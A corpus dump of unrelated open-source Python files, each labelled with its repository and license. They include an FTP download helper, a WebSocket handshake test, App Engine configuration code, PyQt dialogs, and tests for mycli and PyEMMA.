data.pop(name)
interface.write(data)
except:
## ##!!! rollback...
## interface.__sql_reader__.sql.connection.rollback()
raise 'oops!'
# commit...
# XXX make this prittier!
interface.__sql_reader__.sql.connection.commit()
def __iter__(self):
'''
'''
for name in self._data.keys():
yield name
#============================= | ==========================================
# vim:set ts=4 s | w=4 nowrap :
|
kaplun/harvesting-kit | harvestingkit/ftp_utils.py | Python | gpl-2.0 | 11,930 | 0.001676 | # -*- coding: utf-8 -*-
##
## This file is part of Harvesting Kit.
## Copyright (C) 2014 CERN.
##
## Harvesting Kit is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Harvesting Kit is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Harvesting Kit; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import print_function
import sys
import os
import time
from ftplib import FTP, error_perm
from os.path import join
from os import remove, getcwd
from urlparse import urlparse
from netrc import netrc
from datetime import datetime
class FtpHandler(object):
""" This class provides an interface to easily connect to an FTP server,
list its contents and download files/folders.
:param server: the URL to access the FTP server.
:type server: string
:param username: the user-name used to connect to the server.
:type username: string
:param passwd: the password used to connect to the server.
:type passwd: string
:param netrc_file: path to a netrc file that can be used
for authentication with the server.
:type netrc_file: string
"""
def __init__(self, server, username='', passwd='', netrc_file=''):
server = urlparse(server)
if server.netloc:
server = server.netloc
elif server.path:
server = server.path
self._ftp = FTP(server)
self._username = username
self._passwd = passwd
if netrc_file:
logininfo = netrc(netrc_file).authenticators(server)
self._username, _, self._passwd = logininfo
self.connect()
self._home = self._ftp.pwd()
def connect(self):
""" Connects and logins to the server. """
self._ftp.connect()
self._ftp.login(user=self._username, passwd=self._passwd)
def close(self):
""" Closes the connection to the server. """
self._ftp.close()
def download_folder(self, folder='', target_folder=''):
""" Downloads a whole folder from the server.
FtpHandler.download_folder() will download all the files
from the server in the working directory.
:param folder: the absolute path for the folder on the server.
:type folder: string
:param target_folder: absolute or relative path for the
destination folder default is the
working directory.
:type target_folder: string
"""
files, folders = self.ls(folder)
for fl in files:
self.download(join(folder, fl), target_folder)
for fld in folders:
self.download_folder(join(folder, fld), target_folder)
def download(self, source_file, target_folder=''):
""" Downloads a file from the FTP server to target folder
:param source_file: the absolute path for the file on the server
it can be the one of the files coming from
FtpHandler.dir().
:type source_file: string
:param target_folder: relative or absolute path of the
destination folder default is the
working directory.
:type target_folder: string
"""
current_folder = self._ftp.pwd()
if not target_folder.startswith('/'): # relative path
target_folder = join(getcwd(), target_folder)
folder = os.path.dirname(source_file)
self.cd(folder)
if folder.startswith("/"):
folder = folder[1:]
destination_folder = join(target_folder, folder)
if not os.path.exists(destination_folder):
print("Creating folder", destination_folder)
os.makedirs(destination_folder)
source_file = os.path.basename(source_file)
destination = join(destination_folder, source_file)
try:
with open(destination, 'wb') as result:
self._ftp.retrbinary('RETR %s' % (source_file,),
result.write)
except error_perm as e: # source_file is a folder
print(e)
remove(join(target_folder, source_file))
raise
self._ftp.cwd(current_folder)
def cd(self, folder):
""" Changes the working directory on the server.
:param folder: the desired directory.
:type folder: string
"""
if folder.startswith('/'):
self._ftp.cwd(folder)
else:
for subfolder in folder.split('/'):
if subfolder:
self._ftp.cwd(subfolder)
def ls(self, folder=''):
""" Lists the files and folders of a specific directory
default is the current working directory.
:param folder: the folder to be listed.
:type folder: string
:returns: a tuple with the list of files in the folder
and the list of subfolders in the folder.
"""
current_folder = self._ftp.pwd()
self.cd(folder)
contents = []
self._ftp.retrlines('LIST', lambda a: contents.append(a))
files = filter(lambda a: a.split()[0].startswith('-'), contents)
folders = filter(lambda a: a.split()[0].startswith('d'), contents)
files = map(lambda a: ' '.join(a.split()[8:]), files)
folders = map(lambda a: ' '.join(a.split()[8:]), folders)
self._ftp.cwd(current_folder)
return files, folders
def dir(self, folder='', prefix=''):
""" Lists all the files on the folder given as parameter.
FtpHandler.dir() lists all the files on the server.
:para folder: the folder to be listed.
:type folder: string
:param prefix: it does not belong to the interface,
it is used to recursively list the subfolders.
:returns: a list with all the files in the server.
"""
files, folders = self.ls(folder)
result = files
inner = []
for fld in folders:
try:
inner += self.dir(folder + '/' + fld, prefix + fld + '/')
except:
pass
result += inner
if prefix:
result = map(lambda a: prefix + a, result)
return result
def mkdir(self, folder):
""" Creates a folder in the server
:param folder: the folder to be created.
:type | folder: string
"""
current_folder = self._ftp.pwd()
#creates the necessary folders on
#the server if they don't exist
folders = folder.split('/')
for fld in folders:
try:
self.cd(fld)
except error_perm: # folder does not exist
self._ftp.mkd(fld)
self.cd(fld)
self.cd(current_folder)
def rm(self, filename):
""" Delete a file f | rom the server.
:param filename: the file to be deleted.
:type filename: string
"""
try:
self._ftp.delete(filename)
except error_perm: # target is either a directory
# either it does not exist
try:
current_folder = self._ftp.pwd()
self.cd(filename)
except error_perm:
print('550 Delete operation failed %s '
'does not exist!' % (filename,))
else:
self.cd(current_folder)
print('550 Delete operation failed %s '
'is a folder. Use rmdir function '
'to delete it.' % (filename,))
def rmdir(self, folde |
leighpauls/k2cro4 | content/test/data/layout_tests/LayoutTests/http/tests/websocket/tests/hybi/handshake-fail-by-more-protocol-header_wsh.py | Python | bsd-3-clause | 712 | 0.004213 | from mod_pywebsocket import handshake
from mod_pywebsocket.handshake.hybi import compute | _accept
def web_socket_do_extra_handshake(request):
msg = 'HTTP/1.1 101 Switching Protocols\r\n'
msg += 'Upgrade: websocket\r\n'
msg += 'Connection: Upgrade\r\n'
msg += 'Sec-WebSocket-Accept: %s\r\n' % compute_accept(request.headers_in['Sec-WebSocket-Key'])[0]
msg += 'Sec-WebSocket-Protocol: MatchProtocol\r\n'
msg += 'Sec-WebSocket-Protocol: MismatchProtocol\r\n'
msg += '\r\n'
request.connection.write(msg)
ra | ise handshake.AbortedByUserException('Abort the connection') # Prevents pywebsocket from sending its own handshake message.
def web_socket_transfer_data(request):
pass
|
pigeonflight/strider-plone | docker/appengine/google/appengine/tools/devappserver2/application_configuration.py | Python | mit | 19,480 | 0.009138 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stores application configuration taken from e.g. app.yaml, queues.yaml."""
# TODO: Support more than just app.yaml.
import errno
import logging |
import os
import os.path
import random
import string
import threading
import types
from google.appengine.api import appinfo
from google.appengine.api import appinfo_includes
from google | .appengine.api import backendinfo
from google.appengine.api import dispatchinfo
from google.appengine.tools.devappserver2 import errors
# Constants passed to functions registered with
# ModuleConfiguration.add_change_callback.
NORMALIZED_LIBRARIES_CHANGED = 1
SKIP_FILES_CHANGED = 2
HANDLERS_CHANGED = 3
INBOUND_SERVICES_CHANGED = 4
ENV_VARIABLES_CHANGED = 5
ERROR_HANDLERS_CHANGED = 6
NOBUILD_FILES_CHANGED = 7
class ModuleConfiguration(object):
"""Stores module configuration information.
Most configuration options are mutable and may change any time
check_for_updates is called. Client code must be able to cope with these
changes.
Other properties are immutable (see _IMMUTABLE_PROPERTIES) and are guaranteed
to be constant for the lifetime of the instance.
"""
_IMMUTABLE_PROPERTIES = [
('application', 'application'),
('version', 'major_version'),
('runtime', 'runtime'),
('threadsafe', 'threadsafe'),
('module', 'module_name'),
('basic_scaling', 'basic_scaling'),
('manual_scaling', 'manual_scaling'),
('automatic_scaling', 'automatic_scaling')]
def __init__(self, yaml_path):
"""Initializer for ModuleConfiguration.
Args:
yaml_path: A string containing the full path of the yaml file containing
the configuration for this module.
"""
self._yaml_path = yaml_path
self._app_info_external = None
self._application_root = os.path.realpath(os.path.dirname(yaml_path))
self._last_failure_message = None
self._app_info_external, files_to_check = self._parse_configuration(
self._yaml_path)
self._mtimes = self._get_mtimes([self._yaml_path] + files_to_check)
self._application = 'dev~%s' % self._app_info_external.application
self._api_version = self._app_info_external.api_version
self._module_name = self._app_info_external.module
self._version = self._app_info_external.version
self._threadsafe = self._app_info_external.threadsafe
self._basic_scaling = self._app_info_external.basic_scaling
self._manual_scaling = self._app_info_external.manual_scaling
self._automatic_scaling = self._app_info_external.automatic_scaling
self._runtime = self._app_info_external.runtime
if self._runtime == 'python':
logging.warning(
'The "python" runtime specified in "%s" is not supported - the '
'"python27" runtime will be used instead. A description of the '
'differences between the two can be found here:\n'
'https://developers.google.com/appengine/docs/python/python25/diff27',
self._yaml_path)
self._minor_version_id = ''.join(random.choice(string.digits) for _ in
range(18))
@property
def application_root(self):
"""The directory containing the application e.g. "/home/user/myapp"."""
return self._application_root
@property
def application(self):
return self._application
@property
def api_version(self):
return self._api_version
@property
def module_name(self):
return self._module_name or 'default'
@property
def major_version(self):
return self._version
@property
def version_id(self):
if self.module_name == 'default':
return '%s.%s' % (
self.major_version,
self._minor_version_id)
else:
return '%s:%s.%s' % (
self.module_name,
self.major_version,
self._minor_version_id)
@property
def runtime(self):
return self._runtime
@property
def threadsafe(self):
return self._threadsafe
@property
def basic_scaling(self):
return self._basic_scaling
@property
def manual_scaling(self):
return self._manual_scaling
@property
def automatic_scaling(self):
return self._automatic_scaling
@property
def normalized_libraries(self):
return self._app_info_external.GetNormalizedLibraries()
@property
def skip_files(self):
return self._app_info_external.skip_files
@property
def nobuild_files(self):
return self._app_info_external.nobuild_files
@property
def error_handlers(self):
return self._app_info_external.error_handlers
@property
def handlers(self):
return self._app_info_external.handlers
@property
def inbound_services(self):
return self._app_info_external.inbound_services
@property
def env_variables(self):
return self._app_info_external.env_variables
@property
def is_backend(self):
return False
def check_for_updates(self):
"""Return any configuration changes since the last check_for_updates call.
Returns:
A set containing the changes that occured. See the *_CHANGED module
constants.
"""
new_mtimes = self._get_mtimes(self._mtimes.keys())
if new_mtimes == self._mtimes:
return set()
try:
app_info_external, files_to_check = self._parse_configuration(
self._yaml_path)
except Exception, e:
failure_message = str(e)
if failure_message != self._last_failure_message:
logging.error('Configuration is not valid: %s', failure_message)
self._last_failure_message = failure_message
return set()
self._last_failure_message = None
self._mtimes = self._get_mtimes([self._yaml_path] + files_to_check)
for app_info_attribute, self_attribute in self._IMMUTABLE_PROPERTIES:
app_info_value = getattr(app_info_external, app_info_attribute)
self_value = getattr(self, self_attribute)
if (app_info_value == self_value or
app_info_value == getattr(self._app_info_external,
app_info_attribute)):
# Only generate a warning if the value is both different from the
# immutable value *and* different from the last loaded value.
continue
if isinstance(app_info_value, types.StringTypes):
logging.warning('Restart the development module to see updates to "%s" '
'["%s" => "%s"]',
app_info_attribute,
self_value,
app_info_value)
else:
logging.warning('Restart the development module to see updates to "%s"',
app_info_attribute)
changes = set()
if (app_info_external.GetNormalizedLibraries() !=
self.normalized_libraries):
changes.add(NORMALIZED_LIBRARIES_CHANGED)
if app_info_external.skip_files != self.skip_files:
changes.add(SKIP_FILES_CHANGED)
if app_info_external.nobuild_files != self.nobuild_files:
changes.add(NOBUILD_FILES_CHANGED)
if app_info_external.handlers != self.handlers:
changes.add(HANDLERS_CHANGED)
if app_info_external.inbound_services != self.inbound_services:
changes.add(INBOUND_SERVICES_CHANGED)
if app_info_external.env_variables != self.env_variables:
changes.add(ENV_VARIABLES_CHANGED)
if app_info_external.error_handlers != self.error_handlers:
changes.add(ERROR_HANDLERS_CHANGED)
self._app_info_external = app_info_external
if changes:
self._minor_version_id = ''.join(random.choice(string.digits) for _ in
range(18))
return changes
@ |
khalibartan/Antidote-DM | Antidotes DM/Downloader/Credits.py | Python | gpl-2.0 | 3,631 | 0.007436 | # -*- coding: cp1252 -*-
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import *
from PyQt4.QtGui import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CreditsDialog(QtGui.QDialog):
def __init__(self, parent=None):
super(Ui_CreditsDialog, self).__init__(parent)
self.setupUi(self)
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(348, 128)
font = QtGui.QFont()
font.setBold(False)
font.setUnderline(False)
font.setWeight(50)
Dialog.setFont(font)
self.textBrowser = QtGui.QTextBrowser(Dialog)
self.textBrowser.setGeometry(QtCore.QRect(0, 0, 351, 131))
self.textBrowser.setObjectName(_fromUtf8("textBrowser"))
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Credits", None))
self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br | /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; font-style:italic;\">Utkarsh Gupta</span></p>\n"
"<p align=\"center\" sty | le=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">Backend and extractor Development</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; font-style:italic;\">Prabhat Doongarwal</span></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">Frontend and UI Integration</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;\"><br /></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Arial,Verdana,sans-serif\'; font-size:8pt; color:#404040;\">© 2015 ANTIDOTE. All rights reserved</span><span style=\" font-size:8pt;\"> </span></p></body></html>", None))
|
danieljwest/mycli | tests/test_naive_completion.py | Python | bsd-3-clause | 1,653 | 0.00363 | from __future__ import unicode_literals
import pytest
from prompt_toolkit.completion import Completion
from prompt_toolkit.document impor | t Document
@pytest.fixture
def completer():
import mycli.sqlcompleter as sqlcompleter
return sqlcompleter.SQLCompleter(smart_completion=False)
@pytest.fixture
def complete_event():
from mock import Mock
return Mock()
def test_empty_string_completion(completer, complete_event):
text = ''
position = 0
result = set(completer.get_completions(
Document(text=text, cursor_position=positio | n),
complete_event))
assert result == set(map(Completion, completer.all_completions))
def test_select_keyword_completion(completer, complete_event):
text = 'SEL'
position = len('SEL')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([Completion(text='SELECT', start_position=-3)])
def test_function_name_completion(completer, complete_event):
text = 'SELECT MA'
position = len('SELECT MA')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([
Completion(text='MAX', start_position=-2),
Completion(text='MASTER', start_position=-2)])
def test_column_name_completion(completer, complete_event):
text = 'SELECT FROM users'
position = len('SELECT ')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
|
bmccann/examples | mnist_hogwild/main.py | Python | bsd-3-clause | 2,352 | 0.001276 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
from train import train
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 2)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--num-processes', type=int, default | =2, metavar='N',
help='how many training processes to use (default: 2)')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forwa | rd(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = F.relu(self.fc2(x))
return F.log_softmax(x)
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
model = Net()
model.share_memory()
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, model))
p.start()
processes.append(p)
for p in processes:
p.join()
|
thegazelle-ad/gazelle-server | deployment-resources/http-error-static-pages/5xx-static-html-generator.py | Python | mit | 815 | 0.008589 | import os, errno
# Create build folder if it doesn't exist
def get_path(relative_path):
cur_dir = os.path.dirname(__file__)
return os.path.join(cur_dir, relative_path)
try:
os.makedirs(get_path('build'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
template = open(get_path('./5xx.template.html'), 'r')
templateString = template.read()
template.close()
# We only use 0-11 according to
# https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#5xx_Server_error |
for i in range(12):
numString = str(i) if i >= 10 else '0{}'.format(i)
fileName = './build/5{}.html'.format(numString)
outputFile = open(get_path(fileName), 'w')
htmlString = templateString.replace('{ERROR_CODE_PLACEHOLDER}', '5{}'.format(numString))
| outputFile.write(htmlString)
outputFile.close()
|
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247971765/PyQt4/QtGui/QIntValidator.py | Python | gpl-2.0 | 1,504 | 0.009973 | # encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python3/dist-packages/PyQt4/QtGui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from .QValidator import QValidator
class QIntValidator(QValidator):
"""
QIntValidator(QObject parent=None)
QIntValidator(int, int, QObject parent=None)
"""
def bottom(self): # real signature unknown; restored from __doc__
""" QIntValidator.bottom() -> int """
return 0
def fixup(self, p_str): # real signature unknown; restored from __doc__
""" QIntValidator.fixup(str) -> str """
return ""
def setBottom(self, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.setBottom(int) """
| pass
def setRange(self, p_int, p_int_1): # real | signature unknown; restored from __doc__
""" QIntValidator.setRange(int, int) """
pass
def setTop(self, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.setTop(int) """
pass
def top(self): # real signature unknown; restored from __doc__
""" QIntValidator.top() -> int """
return 0
def validate(self, p_str, p_int): # real signature unknown; restored from __doc__
""" QIntValidator.validate(str, int) -> (QValidator.State, str, int) """
pass
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
|
serge-sans-paille/pythran | pythran/analyses/optimizable_comprehension.py | Python | bsd-3-clause | 1,008 | 0 | """
OptimizableComp finds whether a comprehension can be optimized.
"""
from pythran.analyses.identifiers import Identifiers
from pythran.passmanager import NodeAnalysis
class OptimizableComprehension(NodeAnalysis):
"""Find whether a comprehension can be optimized."""
def __init__(self):
self.result = set()
super(OptimizableCompreh | ension, self).__init__(Identifiers)
def check_comprehension(self, iters):
targets = {gen.target.id for gen in iters}
o | ptimizable = True
for it in iters:
ids = self.gather(Identifiers, it)
optimizable &= all(((ident == it.target.id) |
(ident not in targets)) for ident in ids)
return optimizable
def visit_ListComp(self, node):
if (self.check_comprehension(node.generators)):
self.result.add(node)
def visit_GeneratorExp(self, node):
if (self.check_comprehension(node.generators)):
self.result.add(node)
|
TwilioDevEd/api-snippets | notifications/rest/credentials/update-credential/update-credential.7.x.py | Python | mit | 707 | 0 | # NOTE: This example uses the next generation Twilio helper library - for more
# informat | ion on how to download and install this version, visit
# https://www.twilio.com/docs/libraries/python
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
account = os.environ['TWILIO_ACCOUNT_SID']
token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account, token)
credential = client.notify \
.credentials("CRXXXXX | XXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.update(friendly_name="MyCredential",
sandbox=True)
print(credential.friendly_name)
|
markovmodel/PyEMMA | pyemma/coordinates/tests/test_pipeline.py | Python | lgpl-3.0 | 7,347 | 0.002178 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import os
import numpy as np
from pyemma.coordinates.data import DataInMemory
from pyemma.coordinates.data import MDFeaturizer
from pyemma.coordinates import api
import msmtools.generation as msmgen
import tempfile
import pkg_resources
from pyemma.util.files import TemporaryDirectory
import pyemma.coordinates as coor
class TestPipeline(unittest.TestCase):
@classmethod
def setUpClass(cls):
path = pkg_resources.resource_filename(__name__, 'data') + os.path.sep
cls.pdb_file = os.path.join(path, 'bpti_ca.pdb')
cls.feat = MDFeaturizer(cls.pdb_file)
cls.feat.add_all()
cls.traj_files = [
os.path.join(path, 'bpti_001-033.xtc'),
os.path.join(path, 'bpti_067-100.xtc')
]
# generate HMM with two gaussians
p = np.array([[0.99, 0.01], [0.01, 0.99]])
t = 10000
means = [np.array([-1, 1]), np.array([1, -1])]
widths = [np.array([0.3, 2]), np.array([0.3, 2])]
# continuous trajectory
x = np.zeros((t, 2))
# hidden trajectory
dtraj = msmgen.generate_traj(p, t)
for t in range(t):
s = dtraj[t]
x[t, 0] = widths[s][0] * np.random.randn() + means[s][0]
x[t, 1] = widths[s][1] * np.random.randn() + means[s][1]
cls.generated_data = x
cls.generated_lag = 10
def test_is_parametrized(self):
# construct pipeline with all possible transformers
p = api.pipeline(
[
api.source(self.traj_files, top=self.pdb_file),
api.tica(),
api.pca(),
api.cluster_kmeans(k=50),
api.cluster_regspace(dmin=50),
api.cluster_uniform_time(k=20)
], run=False
)
self.assertFalse(p._is_estimated(), "If run=false, the pipeline should not be parametrized.")
p.parametrize()
self.assertTrue(p._is_estimated(), "If parametrized was called, the pipeline should be parametrized.")
def test_np_reader_in_pipeline(self):
with TemporaryDirectory() as td:
file_name = os.path.join(td, "test.npy")
data = np.random.random((100, 3))
np.save(file_name, data)
reader = api.source(file_name)
p = api.pipeline(reader, run=False, stride=2, chunksize=5)
p.parametrize()
def test_add_element(self):
# start with empty pipeline without auto-parametrization
p = api.pipeline([], run=False)
# add some reader
reader = api.source(self.traj_files, top=self.pdb_file)
p.add_element(reader)
p.parametrize()
# get the result immediately
out1 = reader.get_output()
# add some kmeans
kmeans = api.cluster_kmeans(k=15)
p.add_element(kmeans)
p.parametrize()
# get the result immediately
kmeans1 = kmeans.get_output()
# get reader output again
out2 = reader.get_output()
p.add_element(api.cluster_kmeans(k=2))
p.parametrize()
# get kmeans output again
kmeans2 = kmeans.get_output()
# check if add_element changes the intermediate results
np.testing.assert_array_equal(out1[0], out2[0])
np.testing.assert_array_equal(out1[1], out2[1])
np.testing.assert_array_equal(kmeans1[0], kmeans2[0])
np.testing.assert_array_equal(kmeans1[1], kmeans2[1])
def test_set_element(self):
reader = api.source(self.traj_files, top=self.pdb_file)
pca = api.pca()
p = api.pipeline([reader, pca])
self.assertTrue(p._is_estimated())
pca_out = pca.get_output()
tica = api.tica(lag=self.generated_lag)
# replace pca with tica
p.set_element(1, tica)
self.assertFalse(p._is_estimated(), "After replacing an element, the pipeline should not be parametrized.")
p.parametrize()
tica_out = tica.get_output()
# check if replacement actually happened
self.assertFalse(np.array_equal(pca_out[0], tica_out[0]),
"The output should not be the same when the method got replaced.")
@unittest.skip("Known to be broken")
def test_replace_data_source(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
reader_gen = DataInMemory(data=self.generated_data)
kmeans = api.cluster_kmeans(k=10)
assert hasattr(kmeans, '_chunks')
p = api.pipeline([reader_xtc, kmeans])
out1 = kmeans.get_output()
# replace source
print(reader_gen)
| p.set_element(0, reader_gen)
assert hasattr(kmeans, '_chunks')
p.parametrize()
out2 = kmeans.get_output()
self.assertFalse(np.array_equal(out1, out2), "Data source changed, so should the resulting clusters.")
def test_discretizer(self):
reader_gen = DataInMemory(data=self.generated_data)
# check if exception safe
| api.discretizer(reader_gen)._chain[-1].get_output()
api.discretizer(reader_gen, transform=api.tica())._chain[-1].get_output()
api.discretizer(reader_gen, cluster=api.cluster_uniform_time())._chain[-1].get_output()
api.discretizer(reader_gen, transform=api.pca(), cluster=api.cluster_regspace(dmin=10))._chain[-1].get_output()
def test_no_cluster(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
# only reader
api.pipeline(reader_xtc)
reader_xtc.get_output()
# reader + pca / tica
tica = api.tica()
pca = api.pca()
api.pipeline([reader_xtc, tica])._chain[-1].get_output()
api.pipeline([reader_xtc, pca])._chain[-1].get_output()
def test_no_transform(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
api.pipeline([reader_xtc, api.cluster_kmeans(k=10)])._chain[-1].get_output()
api.pipeline([reader_xtc, api.cluster_regspace(dmin=10)])._chain[-1].get_output()
api.pipeline([reader_xtc, api.cluster_uniform_time()])._chain[-1].get_output()
def test_chunksize(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
chunksize = 1001
chain = [reader_xtc, api.tica(), api.cluster_mini_batch_kmeans(batch_size=0.3, k=3)]
p = api.pipeline(chain, chunksize=chunksize, run=False)
assert p.chunksize == chunksize
for e in p._chain:
assert e.chunksize == chunksize
if __name__ == "__main__":
unittest.main()
|
stanford-futuredata/macrobase | tools/bench/contextual/contextual_execute_workflows.py | Python | apache-2.0 | 12,283 | 0.002198 | import argparse
import json
import os
from time import strftime
testing_dir = "workflows"
batch_template_conf_file = "contextual_batch_template.conf"
streaming_template_conf_file = "contextual_streaming_template.conf"
default_args = {
"macrobase.analysis.minOIRatio": 3.0,
"macrobase.analysis.minSupport": 0.5,
"macrobase.analysis.usePercentile": "true",
"macrobase.analysis.targetPercentile": 0.99,
"macrobase.analysis.useZScore": "false",
"macrobase.loader.db.user": os.getenv('USER', None),
"macrobase.loader.db.password": None,
"macrobase.analysis.zscore.threshold": 5.0,
"macrobase.analysis.streaming.inputReservoirSize": 10000,
"macrobase.analysis.streaming.scoreReservoirSize": 10000,
"macrobase.analysis.streaming.inlierItemSummarySize": 10000,
"macrobase.analysis.streaming.outlierItemSummarySize": 10000,
"macrobase.analysis.streaming.summaryUpdatePeriod": 100000,
"macrobase.analysis.streaming.modelUpdatePeriod": 100000,
"macrobase.analysis.streaming.useRealTimePeriod": "false",
"macrobase.analysis.streaming.useTupleCountPeriod": "true",
"macrobase.analysis.streaming.warmupCount": 50000,
"macrobase.analysis.streaming.decayRate": 0.01,
"macrobase.analysis.mcd.alpha": 0.5,
"macrobase.analysis.mcd.stoppingDelta": 0.001,
"macrobase.analysis.contextual.denseContextTau": 0.1,
"macrobase.analysis.contextual.numIntervals": 10,
}
def process_config_parameters(config_parameters):
for config_parameter_type in config_parameters:
if type(config_parameters[config_parameter_type]) == list:
config_parameters[config_parameter_type] = ", ".join(
[str(para) for para in config_parameters[config_parameter_type]])
def create_config_file(config_parameters, conf_file):
template_conf_file = batch_template_conf_file \
if config_parameters["isBatchJob"] else streaming_template_conf_file
template_conf_contents = open(template_conf_file, 'r').read()
conf_contents = template_conf_contents % config_parameters
with open(conf_file, 'w') as f:
f.write(conf_contents)
def parse_results(results_file):
times = dict()
num_itemsets = 0
num_iterations = 0
tuples_per_second = 0.0
